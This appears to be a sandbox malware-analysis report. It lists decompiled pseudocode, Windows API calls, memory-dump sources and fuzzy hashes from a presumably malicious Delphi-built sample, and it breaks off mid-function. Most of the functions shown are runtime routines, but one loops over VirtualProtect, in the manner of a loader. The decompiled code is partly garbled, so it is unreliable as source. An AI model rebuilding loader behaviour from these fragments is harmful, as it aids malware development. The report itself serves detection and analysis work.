                                                                            • Opcode Fuzzy Hash: 956964d0e594b963543663876903ecf3408bc7f3908dee6d6cb4c89ebefcd960
                                                                            • Instruction Fuzzy Hash: 7CD012A17002008BCF50EF7AC5C47177BDC5B06315B44C4B7A809EF247D67CC4508B24
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            E0359356C() {
                                                                                int _t1;
                                                                                signed int _t4;
                                                                                int _t5;

                                                                                _t5 = 0;
                                                                                _t1 = GetKeyboardType(0); // executed
                                                                                if(_t1 == 7) {
                                                                                    _t4 = GetKeyboardType(1) & 0x0000ff00;
                                                                                    if(_t4 == 0xd00 || _t4 == 0x400) {
                                                                                        _t5 = 1;
                                                                                    }
                                                                                }
                                                                                return _t5;
                                                                            }


                                                                            APIs
                                                                            • GetKeyboardType.USER32 ref: 03593571
                                                                            • GetKeyboardType.USER32 ref: 0359357D
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                            • Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp
                                                                            • Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: KeyboardType
                                                                            • String ID:
                                                                            • API String ID: 1620330385-0
                                                                            • Opcode ID: 3abda0efe1a447a46643a35925134895fb0dc59df20db972b0bc10d38a8c27a4
                                                                            • Instruction ID: 61c34126dd18030c179a013f3a0724c16bafc373728c8923319f093158b38638
                                                                            • Opcode Fuzzy Hash: 3abda0efe1a447a46643a35925134895fb0dc59df20db972b0bc10d38a8c27a4
                                                                            • Instruction Fuzzy Hash: 6AD012DD64530299FF32E598E8C577DC714B75D31CF580873D208DC5F0D44598445412
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,00423BB6), ref: 00423A88
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            • Opcode ID: 024347893320b92dfb4bad89f0ad8004936e86fda0b6909bc66a116ae120d134
                                                                            • Instruction ID: bbbba562cf4ef8ad2c766562c27961f1ed0d25de4a21f7584f0d3e043cf70339
                                                                            • Opcode Fuzzy Hash: 024347893320b92dfb4bad89f0ad8004936e86fda0b6909bc66a116ae120d134
                                                                            • Instruction Fuzzy Hash: 8821C230B04218AFDB11DEA5E952B9EB7F99B44304F5044BBB904E3282DB7DAF049608
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateWindowExA.USER32 ref: 0040734B
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: b58db20c084d251a18b2a55008c9825ef2296b69c151f418164321b74b5c3328
                                                                            • Instruction ID: b85b0cc3f2e5bc7e9d45a46899a2df812a80ae235cc29424d0f8592cef13ccd6
                                                                            • Opcode Fuzzy Hash: b58db20c084d251a18b2a55008c9825ef2296b69c151f418164321b74b5c3328
                                                                            • Instruction Fuzzy Hash: 3FF074B2705118BF9B40DE9DDC81D9B7BECEB4D264B054169FA08E3201D635ED1087A4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateWindowExA.USER32 ref: 0040734B
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: af7131fd70f04d561484b010640c15216212988d875a779ef6235dcc54e20eb2
                                                                            • Instruction ID: e61e4b7de7878b32b5720a0b5ecd670a84b3b3b45b0905eabb5fb271e5fc7604
                                                                            • Opcode Fuzzy Hash: af7131fd70f04d561484b010640c15216212988d875a779ef6235dcc54e20eb2
                                                                            • Instruction Fuzzy Hash: 52F097B2605118BF9B40DE9DDC81DDF7BECEB4D264B054169FA0CE3201D635ED1087A4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateWindowExA.USER32 ref: 004073A1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: 624295222e5b5063965c5aa621892c6fe0a9898fd49347bfc06a69575b0ebae6
                                                                            • Instruction ID: 85808ded18d7c00b20e9529308029099665b44857ea87863c4fce7c96cc8d2ed
                                                                            • Opcode Fuzzy Hash: 624295222e5b5063965c5aa621892c6fe0a9898fd49347bfc06a69575b0ebae6
                                                                            • Instruction Fuzzy Hash: A4F092B2605118BFDB80DE9EDC81E9B7BECEB4D265B00416AFA0CE7241D535ED1087A4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 33%
E035A4E37(void* __eax, signed int __ebx, void* __ecx, signed char __edx, void* __esi, void* __eflags) {
    void* _t22;
    intOrPtr* _t23;
    signed int _t35;
    intOrPtr _t38;
    signed char _t42;
    intOrPtr _t44;
    intOrPtr _t45;
    signed int _t46;
    void* _t47;
    void* _t48;

    _t47 = __esi;
    _t42 = __edx;
    _t35 = __ebx;
    _t22 = __eax;
    asm("popad");
    if(__eflags < 0) {
        *__eax =  *__eax + __al;
        *__eax =  *__eax + __al;
        __eflags =  *__eax;
    }
    asm("adc [ecx+0x3], bl");
    _t23 = _t22 - 1;
    *_t23 =  *_t23 + _t23;
    *_t23 =  *_t23 + _t23;
    asm("adc [ecx+0x3], bl");
    _t19 = _t48 + 0x54;
    *_t19 =  *(_t48 + 0x54) | _t42;
    __eflags =  *_t19;
    _push(0x64616572);
    if( *_t19 >= 0) {
        goto L2;
    } else {
        asm("in eax, 0x5a");
        goto [far dword [0x53000000];
    }
    while(1) {
        L2:
        VirtualProtect(_t23 +  *((intOrPtr*)(_t48 - 0xc)), ??, ??, ??); // executed
        _t35 = _t35 + 1;
        _t14 = _t48 - 0x38;
        *_t14 =  *((intOrPtr*)(_t48 - 0x38)) - 1;
        if( *_t14 == 0) {
            break;
        }
        _push(_t48 - 0x34);
        _t46 = _t35 + _t35 * 4;
        _push(E035A4220( *((intOrPtr*)(_t47 + 0x24 + _t46 * 8))));
        _push( *((intOrPtr*)(_t47 + 8 + _t46 * 8)));
        _t23 =  *((intOrPtr*)(_t47 + 0xc + _t46 * 8));
    }
    _t38 =  *0x35a40a8; // 0x35a40ac
    E03595074( *((intOrPtr*)(_t48 + 8)), _t38, _t48 - 0x20);
    _pop(_t44);
    *[fs:eax] = _t44;
    _push(E035A4E21);
    _t45 =  *0x35a40a8; // 0x35a40ac
    return E03594E10(_t48 - 0x20, _t45);
    goto L2;
}


                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                            • Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp
                                                                            • Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 240d5bb4fa8c043b02a31812011fc8d23fdeef24393895d2d085469ab3073ddb
                                                                            • Instruction ID: c1fad2c88b951ef2c4069e01bfa5e0ec8124dd0bdb9957053ba5aea381d42e0e
                                                                            • Opcode Fuzzy Hash: 240d5bb4fa8c043b02a31812011fc8d23fdeef24393895d2d085469ab3073ddb
                                                                            • Instruction Fuzzy Hash: EA01F47540A7849FCF07D7E5FD5099C7B75FB42210B1A44D6D0049E272C2785C0AEB11
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00405C3A
                                                                              • Part of subcall function 00405E80: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00400000,00461790), ref: 00405E9C
                                                                              • Part of subcall function 00405E80: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,00461790), ref: 00405EBA
                                                                              • Part of subcall function 00405E80: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,00461790), ref: 00405ED8
                                                                              • Part of subcall function 00405E80: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405EF6
                                                                              • Part of subcall function 00405E80: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00405F85,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405F3F
                                                                              • Part of subcall function 00405E80: RegQueryValueExA.ADVAPI32(?,004060EC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00405F85,?,80000001), ref: 00405F5D
                                                                              • Part of subcall function 00405E80: RegCloseKey.ADVAPI32(?,00405F8C,00000000,?,?,00000000,00405F85,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405F7F
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Open$FileModuleNameQueryValue$Close
                                                                            • String ID:
                                                                            • API String ID: 2796650324-0
                                                                            • Opcode ID: bc21d5101fc51bdf4626e6ca00cb4df6505cc7613c57e159f19c307d06cb48aa
                                                                            • Instruction ID: 1b0a8c2aa0dbabf6a82ae7d2e2fcdd13184de0ac0e476d2ee2bc6056b14444b1
                                                                            • Opcode Fuzzy Hash: bc21d5101fc51bdf4626e6ca00cb4df6505cc7613c57e159f19c307d06cb48aa
                                                                            • Instruction Fuzzy Hash: 9BE06D71A007108FDB10EE98C8C5A9333D8EB08754F0005A6ED98EF386D374DD908BD4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E03595520(void* __eax) {
    char _v272;
    intOrPtr _t14;
    void* _t16;
    intOrPtr _t18;
    CHAR* _t19;

    _t16 = __eax;
    if( *((intOrPtr*)(__eax + 0x10)) == 0) {
        _t3 = _t16 + 4; // 0x3590000
        GetModuleFileNameA( *_t3,  &_v272, 0x105);
        _t14 = E03595784(_t19); // executed
        _t18 = _t14;
        *((intOrPtr*)(_t16 + 0x10)) = _t18;
        if(_t18 == 0) {
            _t5 = _t16 + 4; // 0x3590000
            *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
        }
    }
    _t7 = _t16 + 0x10; // 0x3590000
    return  *_t7;
}


                                                                            APIs
                                                                            • GetModuleFileNameA.KERNEL32(03590000,?,00000105), ref: 0359553E
                                                                              • Part of subcall function 03595784: GetModuleFileNameA.KERNEL32(00000000,?,00000105,03590000,035A8790), ref: 035957A0
                                                                              • Part of subcall function 03595784: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,03590000,035A8790), ref: 035957BE
                                                                              • Part of subcall function 03595784: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,03590000,035A8790), ref: 035957DC
                                                                              • Part of subcall function 03595784: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 035957FA
                                                                              • Part of subcall function 03595784: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,03595889,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 03595843
                                                                              • Part of subcall function 03595784: RegQueryValueExA.ADVAPI32(?,035959F0,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,03595889,?,80000001), ref: 03595861
                                                                              • Part of subcall function 03595784: RegCloseKey.ADVAPI32(?,03595890,00000000,?,?,00000000,03595889,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03595883
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                            • Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp
                                                                            • Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: Open$FileModuleNameQueryValue$Close
                                                                            • String ID:
                                                                            • API String ID: 2796650324-0
                                                                            • Opcode ID: 869449d0d2f28efb40d020fa3a329847918f88d1a01f403c69ed6433847cf695
                                                                            • Instruction ID: 33b58cfe1f68e91735ad2df7e97a0f42bc1219bae12cf5ea9c075851ed905bf8
                                                                            • Opcode Fuzzy Hash: 869449d0d2f28efb40d020fa3a329847918f88d1a01f403c69ed6433847cf695
                                                                            • Instruction Fuzzy Hash: 9AE06D75A003119FDF10DE5CD8C4A4633E8BB09664F040992ED58CF246E3B0DA2087D0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • DefWindowProcA.USER32(?,?,?,?), ref: 00455FDE
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ProcWindow
                                                                            • String ID:
                                                                            • API String ID: 181713994-0
                                                                            • Opcode ID: feadc97ff837b75b266de6139b99dc6f72c8cfb3ed8b0667b2d15d3104d4f2d8
                                                                            • Instruction ID: a24cf2be33493bd3f548c5cb2912f0d98b4921db6f5013c36e2596895fdb8764
                                                                            • Opcode Fuzzy Hash: feadc97ff837b75b266de6139b99dc6f72c8cfb3ed8b0667b2d15d3104d4f2d8
                                                                            • Instruction Fuzzy Hash: 5DF0C579205608AFCB40DF9DC588D4AFBE9BB4C760B058195B988CB321C234FD80CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E03597B68(void* __eax) {
    signed char _t5;

    _t5 = GetFileAttributesA(E035947DC(__eax)); // executed
    if(_t5 == 0xffffffff || (_t5 & 0x00000010) != 0) {
        return 0;
    } else {
        return 1;
    }
}


                                                                            APIs
                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,035A6B13,035A4E54,00000008,00000040,00000000,00000000,DllRegisterServer,035A4E54,00000008,00000040,00000000,00000000,CryptSIPVerifyIndirectData,035A4E54), ref: 03597B73
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                            • Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp
                                                                            • Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: c15bba489eecb7c30a673aa07caeef76b2291a5700813f344973d9c2e1ce2c75
                                                                            • Instruction ID: 892c99690383e696628de7d7afbe658acea712d817fac0f286eea093f3ea36a2
                                                                            • Opcode Fuzzy Hash: c15bba489eecb7c30a673aa07caeef76b2291a5700813f344973d9c2e1ce2c75
                                                                            • Instruction Fuzzy Hash: 6DC08CA52223010ABE50F2FC3CC408A4298298D035B2C0F23A02CC76F2E229842B2010
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00421742
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 89e6221551a74eb15f9e48ced21239ad1d285c4e27d512bd12529dafe54f9687
                                                                            • Instruction ID: 827c15edd165ef37d5224862c0752f9a577ccbf913505635d27218b0d4be8635
                                                                            • Opcode Fuzzy Hash: 89e6221551a74eb15f9e48ced21239ad1d285c4e27d512bd12529dafe54f9687
                                                                            • Instruction Fuzzy Hash: EC1148782403159FC710DF19D880B42B7E5EB98790F24C53AE9598B396E3B4E9058BA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,00401AFF,?,004020BD), ref: 004016DE
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 529b24f2eb1d7a78af4946a119c865930d0c7bde26a066f6f9e42cf2a5f2b5b0
                                                                            • Instruction ID: 2b17dd7dffbc5f012c9b03bba10325585f0ff40c38224672d8caf756a086162d
                                                                            • Opcode Fuzzy Hash: 529b24f2eb1d7a78af4946a119c865930d0c7bde26a066f6f9e42cf2a5f2b5b0
                                                                            • Instruction Fuzzy Hash: C0F037F0B013405BEB09DFBA9D513026AD2E78934AF14C13AE609EB3A8F7B585018B18
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E035915BC(signed int __eax) {
    void* _t4;
    intOrPtr _t7;
    signed int _t8;
    void* _t10;
    void** _t15;
    void* _t17;

    _t8 = __eax;
    L03591550(__eax);
    _t4 = VirtualAlloc(0, 0x140000, 0x1000, 4); // executed
    if(_t4 == 0) {
        *0x35aa718 = 0;
        return 0;
    } else {
        _t15 = *0x35aa704; // 0x3720000
        _t10 = _t4;
        *_t10 = 0x35aa700;
        *0x35aa704 = _t4;
        *(_t10 + 4) = _t15;
        *_t15 = _t4;
        _t17 = _t4 + 0x140000;
        *((intOrPtr*)(_t17 - 4)) = 2;
        *0x35aa718 = 0x13fff0 - _t8;
        _t7 = _t17 - _t8;
        *0x35aa714 = _t7;
        *(_t7 - 4) = _t8 | 0x00000002;
        return _t7;
    }
}


                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,035919F3), ref: 035915D2
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                            • Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp
                                                                            • Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: ccf99e2467cc84680d9c832f883459c5cfe3cae67b5cd4f329e4291dae2cb102
                                                                            • Instruction ID: f7f98cad43596db549e8f0a69bf42b62a76465e0271b80a5335698a83bb26574
                                                                            • Opcode Fuzzy Hash: ccf99e2467cc84680d9c832f883459c5cfe3cae67b5cd4f329e4291dae2cb102
                                                                            • Instruction Fuzzy Hash: 20F0FFF0B017014FEB45EF79E9807167AE2F789245F248079D605DB3A8E6758506E740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 63%
E03593FF8(intOrPtr __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
    void* _t27;
    char _t32;
    signed int _t33;
    signed int _t34;
    int _t42;
    void* _t55;
    intOrPtr _t60;
    void _t66;
    intOrPtr* _t67;
    intOrPtr* _t68;
    void* _t69;
    intOrPtr _t72;
    struct HINSTANCE__* _t87;
    intOrPtr _t89;
    intOrPtr _t90;
    void* _t91;
    void* _t92;

    _t72 = __edx;
    _t60 = __ebx;
    _t27 = memcpy(_t89 - 0x3c, 0x35ac7c0, 0xb << 2);
    _t92 = _t91 + 0xc;
    _pop(*0x35ac7e0);
    _pop(*0x35ac7dc);
    *0x35ac7d4 = _t89;
    *0x35ac7d8 = __ebx;
    *0x35ac7c8 = _t27;
    *0x35ac7d0 = _t72;
    *0x35ac7c0 = _t89 - 0x3c;
    _t66 = 0;
    if(*(_t89 + 0xc) == 0) {
        _t66 = *_t27;
    }
    *0x35ac7cc = _t66;
    *0x35aa014 = 0x3591168;
    *0x35aa018 = 0x3591170;
    L03593EE4();
    _t32 = *(_t89 + 0xc) + 1;
    *0x35ac7e8 = _t32;
    _t33 = _t32 - 1;
    _pop(_t67);
    *0x35ac7e4 = *_t67;
    if(_t33 != 0 && _t33 < 3) {
        *((intOrPtr*)(_t67 + _t33 * 4))();
    }
    _push(_t67);
    _t68 = *((intOrPtr*)(_t92 + 8));
    if(_t68 != 0) {
        *_t68();
    }
    _pop(_t69);
    _t34 = *(_t89 + 0xc);
    if(_t34 >= 3) {
        *((intOrPtr*)(_t69 + _t34 * 4))();
    }
    if(*0x35aa02c == 0) {
        *0x35aa034 = 1;
        asm("fnstcw word [0x35a8024]");
    }
    if(*(_t89 + 0xc) != 1) {
        _push(_t60);
        _push(0x35ac7c0);
        _push(0x35ac7d6);
        _push(_t89);
        if(*0x035AC7E8 != 0 || *0x35aa040 == 0) {
            L16:
            if(*0x35a8004 != 0) {
                E03594128();
                E035941BC(_t69);
                *0x35a8004 = 0;
            }
            L18:
            if(*((char*)(0x35ac7e8)) == 2 && *0x35a8000 == 0) {
                *0x035AC7CC = 0;
            }
            L03593F2C();
            if(*((char*)(0x35ac7e8)) <= 1 || *0x35a8000 != 0) {
                _t80 = *0x035AC7D0;
                if(*0x035AC7D0 != 0) {
                    L03595AF4(_t80);
                    _t90 = *((intOrPtr*)(0x35ac7d0));
                    _t21 = _t90 + 0x10; // 0x3590000
                    _t87 = *_t21;
                    _t22 = _t90 + 4; // 0x3590000
                    if(_t87 != *_t22 && _t87 != 0) {
                        FreeLibrary(_t87);
                    }
                }
            }
            L03593F04();
            if(*((char*)(0x35ac7e8)) == 1) {
                *0x035AC7E4();
            }
            if(*((char*)(0x35ac7e8)) != 0) {
                E0359418C();
            }
            if(*0x35ac7c0 == 0) {
                if(*0x35aa024 != 0) {
                    *0x35aa024();
                }
                _t42 = *0x35a8000; // 0x0
                ExitProcess(_t42);
            }
            memcpy(0x35ac7c0, *0x35ac7c0, 0xb << 2);
            _t92 = _t92 + 0xc;
            goto L18;
        } else {
            do {
                *0x35aa040 = 0;
                *((intOrPtr*)(*0x35aa040))();
            } while (*0x35aa040 != 0);
            goto L16;
        }
    } else {
        _t55 = E03593F90(); // executed
        return _t55;
    }
}


                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                            • Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp
                                                                            • Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dc95854858e10798446e323f7915729a2f21f1ad6e91984b7837d1fb1b84958b
                                                                            • Instruction ID: e3214d9cc8ecb0a077a03f20ebfe73ca42ff4795651af1370b8e5ea22e661c5f
                                                                            • Opcode Fuzzy Hash: dc95854858e10798446e323f7915729a2f21f1ad6e91984b7837d1fb1b84958b
                                                                            • Instruction Fuzzy Hash: 8021F4B9504A059FDB18EF29E444A6ABBF4FB49315F54801EE804CB238D731594AFB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                            • Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp
                                                                            • Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d7de1925da806f65d7d530c067f10aac7f3e8d0c4992daa96e9b6c3cfeba7af4
                                                                            • Instruction ID: 80ac156c35056acb340244b866cdfb40d0e7d38eb9bf993f5a24bb1b124f27e1
                                                                            • Opcode Fuzzy Hash: d7de1925da806f65d7d530c067f10aac7f3e8d0c4992daa96e9b6c3cfeba7af4
                                                                            • Instruction Fuzzy Hash: 2BF06D7A608A45DFEB21CE5AE89181AF7F8FB4962035A007BF904C7620D635AC159A60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            C-Code - Quality: 84%
E00452B78(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
    intOrPtr* _v8;
    char _v12;
    intOrPtr _t157;
    intOrPtr _t161;
    intOrPtr _t163;
    intOrPtr _t164;
    intOrPtr _t165;
    intOrPtr _t169;
    intOrPtr _t174;
    intOrPtr _t176;
    intOrPtr _t177;
    void* _t179;
    struct HWND__* _t180;
    long _t190;
    long _t241;
    intOrPtr _t247;
    int _t252;
    intOrPtr _t253;
    intOrPtr _t266;
    intOrPtr _t270;
    signed int _t276;
    intOrPtr _t277;
    intOrPtr _t290;
    intOrPtr _t294;
    intOrPtr _t298;
    intOrPtr _t299;
    void* _t307;
    void* _t309;
    intOrPtr _t316;
    signed int _t326;
    signed int _t327;
    void* _t329;
    long _t333;
    intOrPtr _t337;
    struct HWND__* _t342;
    signed int _t344;
    signed int _t345;
    signed int _t348;
    signed int _t350;
    long _t351;
    signed int _t354;
    signed int _t356;
    signed int _t357;
    void* _t359;
    intOrPtr _t373;
    signed int _t389;
    signed int _t390;
    intOrPtr _t391;
    signed int _t400;
    signed int _t401;
    signed int _t403;
    signed int _t405;
    long _t406;
    signed int _t408;
    long _t409;
    signed int _t411;
    signed int _t412;
    void* _t414;
    void* _t415;
    intOrPtr _t416;

    _t414 = _t415;
    _t416 = _t415 + 0xfffffff8;
    _v12 = 0;
    _v8 = __eax;
    _push(_t414);
    _push(0x453183);
    _push(*[fs:eax]);
    *[fs:eax] = _t416;
    if((*(_v8 + 0x1c) & 0x00000010) == 0 && (*(_v8 + 0x358) & 0x00000004) != 0) {
        _t337 = *0x462f24; // 0x423578
        E00406740(_t337, &_v12);
